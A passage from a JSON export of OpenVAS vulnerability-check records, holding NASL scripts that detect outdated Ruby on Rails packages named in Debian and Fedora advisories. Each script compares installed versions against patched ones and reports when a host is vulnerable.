Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703464\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2015-3226\", \"CVE-2015-3227\", \"CVE-2015-7576\", \"CVE-2015-7577\",\n \"CVE-2015-7581\", \"CVE-2016-0751\", \"CVE-2016-0752\", \"CVE-2016-0753\");\n script_name(\"Debian Security Advisory DSA 3464-1 (rails - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-05 13:14:24 +0530 (Fri, 05 Feb 2016)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3464.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n 
script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"rails on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthese problems have been fixed in version 2:4.1.8-1+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.1-1.\n\nWe recommend that you upgrade your rails packages.\");\n script_tag(name:\"summary\", value:\"Multiple security issues have been\ndiscovered in the Ruby on Rails web application development framework, which may\nresult in denial of service, cross-site scripting, information disclosure or\nbypass of input validation.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport-2.3\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = 
isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.1.8-1+deb8u1\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:55:18", "description": "Multiple security issues have been\ndiscovered in the Ruby on Rails web application development framework, which may\nresult in denial of service, cross-site scripting, information disclosure or\nbypass of input validation.", "cvss3": {}, "published": "2016-02-05T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3464-1 (rails - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7577", "CVE-2015-3227", "CVE-2015-7576", "CVE-2016-0751", "CVE-2015-7581", "CVE-2016-0753", "CVE-2015-3226", "CVE-2016-0752"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703464", "href": "http://plugins.openvas.org/nasl.php?oid=703464", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3464.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3464-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703464);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2015-3226\", \"CVE-2015-3227\", \"CVE-2015-7576\", \"CVE-2015-7577\",\n \"CVE-2015-7581\", \"CVE-2016-0751\", \"CVE-2016-0752\", \"CVE-2016-0753\");\n script_name(\"Debian Security Advisory DSA 3464-1 (rails - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2016-02-05 13:14:24 +0530 (Fri, 05 Feb 2016)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3464.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"rails on Debian Linux\");\n script_tag(name: \"insight\", value: \"Rails is a full-stack, open-source\nweb framework in Ruby for writing real-world applications.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthese problems have been fixed in version 2:4.1.8-1+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 2:4.2.5.1-1.\n\nWe recommend that you upgrade your rails packages.\");\n script_tag(name: \"summary\", 
value: \"Multiple security issues have been\ndiscovered in the Ruby on Rails web application development framework, which may\nresult in denial of service, cross-site scripting, information disclosure or\nbypass of input validation.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport-2.3\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.1.8-1+deb8u1\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": 
"AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2019-05-29T18:35:28", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-08-27T00:00:00", "type": "openvas", "title": "Fedora Update for rubygem-actionview FEDORA-2016-ab8bf51cf3", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310809171", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310809171", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for rubygem-actionview FEDORA-2016-ab8bf51cf3\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.809171\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-27 05:53:27 +0200 (Sat, 27 Aug 2016)\");\n script_cve_id(\"CVE-2016-6316\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for rubygem-actionview FEDORA-2016-ab8bf51cf3\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'rubygem-actionview'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"rubygem-actionview on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-ab8bf51cf3\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/WHYGEL6GEXD5GMJSM2FCGFAPH4NJAWH3\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"rubygem-actionview\", rpm:\"rubygem-actionview~4.2.3~6.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-07-21T21:53:46", "description": "This host is running Ruby on Rails and is\n prone to cross site scripting vulnerability.", "cvss3": {}, "published": "2016-10-13T00:00:00", "type": "openvas", "title": "Ruby on Rails Action View Cross Site Scripting Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2020-07-14T00:00:00", "id": "OPENVAS:1361412562310807379", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807379", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Ruby on Rails Action View Cross Site Scripting Vulnerability (Windows)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:rubyonrails:rails\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807379\");\n script_version(\"2020-07-14T14:33:06+0000\");\n script_cve_id(\"CVE-2016-6316\");\n script_bugtraq_id(92430);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-07-14 14:33:06 +0000 (Tue, 14 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2016-10-13 14:29:50 +0530 (Thu, 13 Oct 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Ruby on Rails Action View Cross Site Scripting Vulnerability (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is running Ruby on Rails and is\n prone to cross site scripting vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to the Text declared as\n 'HTML safe' when passed as an attribute value to a tag helper will not have\n quotes escaped which can lead to an XSS attack.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow a remote\n attacker to inject arbitrary web script or HTML via crafted parameters.\");\n\n script_tag(name:\"affected\", value:\"Ruby on Rails 3.x before 3.2.22.3,\n Ruby on Rails 4.x before 4.2.7.1 and\n Ruby on Rails 5.x before 5.0.0.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Ruby on Rails 3.2.22.3 or 4.2.7.1 or\n 5.0.0.1 or later.\");\n\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/oss-sec/2016/q3/260\");\n script_xref(name:\"URL\", value:\"https://groups.google.com/forum/#!msg/rubyonrails-security/I-VWr034ouk/gGu2FrCwDAAJ\");\n script_xref(name:\"URL\", value:\"http://weblog.rubyonrails.org/2016/8/11/Rails-5-0-0-1-4-2-7-2-and-3-2-22-3-have-been-released\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rails_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"rails/detected\", \"Host/runs_windows\");\n exit(0);\n}\n\ninclude( \"version_func.inc\" );\ninclude( \"host_details.inc\" );\n\nif( isnull( port = get_app_port( cpe: CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) )\n exit( 0 );\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nVULN = FALSE;\n\nif( version =~ \"^(3\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"3.2.22.3\" ) )\n {\n fix = \"3.2.22.3\";\n VULN = TRUE;\n }\n}\n\nelse if( version =~ \"^(4\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"4.2.7.1\" ) )\n {\n fix = \"4.2.7.1\";\n VULN = TRUE;\n }\n}\n\nelse if( version =~ \"^(5\\.)\" )\n{\n if( version_is_less( version: version, test_version: \"5.0.0.1\" ) )\n {\n fix = \"5.0.0.1\";\n VULN = TRUE;\n }\n}\n\nif( VULN )\n{\n report = report_fixed_ver( installed_version: version, fixed_version: fix, install_path: location );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:19", "description": "Andrew Carpenter of Critical Juncture\ndiscovered a cross-site scripting vulnerability affecting Action View in rails,\na web application framework written in Ruby. 
Text declared as HTML safe\nwill not have quotes escaped when used as attribute values in tag helpers.", "cvss3": {}, "published": "2016-08-25T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3651-1 (rails - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310703651", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703651", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3651.nasl 14279 2019-03-18 14:48:34Z cfischer $\n# Auto-generated from advisory DSA 3651-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703651\");\n script_version(\"$Revision: 14279 $\");\n script_cve_id(\"CVE-2016-6316\");\n script_name(\"Debian Security Advisory DSA 3651-1 (rails - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:48:34 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-08-25 00:00:00 +0200 (Thu, 25 Aug 2016)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2016/dsa-3651.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"rails on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie),\nthis problem has been fixed in version 2:4.1.8-1+deb8u4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:4.2.7.1-1.\n\nWe recommend that you upgrade your rails packages.\");\n script_tag(name:\"summary\", value:\"Andrew Carpenter of Critical Juncture\ndiscovered a cross-site scripting vulnerability affecting Action View in rails,\na web application framework written in Ruby. 
Text declared as HTML safe\nwill not have quotes escaped when used as attribute values in tag helpers.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software\nversion using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-activesupport-2.3\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.1.8-1+deb8u4\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-24T12:55:10", "description": "Andrew Carpenter of Critical Juncture\ndiscovered a cross-site scripting vulnerability affecting Action View in rails,\na web application framework written in Ruby. 
Text declared as HTML safe \nwill not have quotes escaped when used as attribute values in tag helpers.", "cvss3": {}, "published": "2016-08-25T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 3651-1 (rails - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-6316"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:703651", "href": "http://plugins.openvas.org/nasl.php?oid=703651", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3651.nasl 6608 2017-07-07 12:05:05Z cfischer $\n# Auto-generated from advisory DSA 3651-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703651);\n script_version(\"$Revision: 6608 $\");\n script_cve_id(\"CVE-2016-6316\");\n script_name(\"Debian Security Advisory DSA 3651-1 (rails - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:05 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2016-08-25 00:00:00 +0200 (Thu, 25 Aug 2016)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n script_tag(name: \"qod_type\", value: \"package\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2016/dsa-3651.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2016 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"rails on Debian Linux\");\n script_tag(name: \"insight\", value: \"Rails is a full-stack, open-source web\nframework in Ruby for writing real-world applications.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (jessie),\nthis problem has been fixed in version 2:4.1.8-1+deb8u4.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2:4.2.7.1-1.\n\nWe recommend that you upgrade your rails packages.\");\n script_tag(name: \"summary\", value: \"Andrew Carpenter of Critical Juncture\ndiscovered a cross-site scripting vulnerability affecting Action View in rails,\na web 
application framework written in Ruby. Text declared as HTML safe \nwill not have quotes escaped when used as attribute values in tag helpers.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"rails\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionmailer\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionpack\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-actionview\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activemodel\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activerecord\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-activesupport-2.3\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-rails\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby-railties\", ver:\"2:4.1.8-1+deb8u4\", rls_regex:\"DEB8.[0-9]+\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2020-07-21T21:54:04", "description": "This host is running 
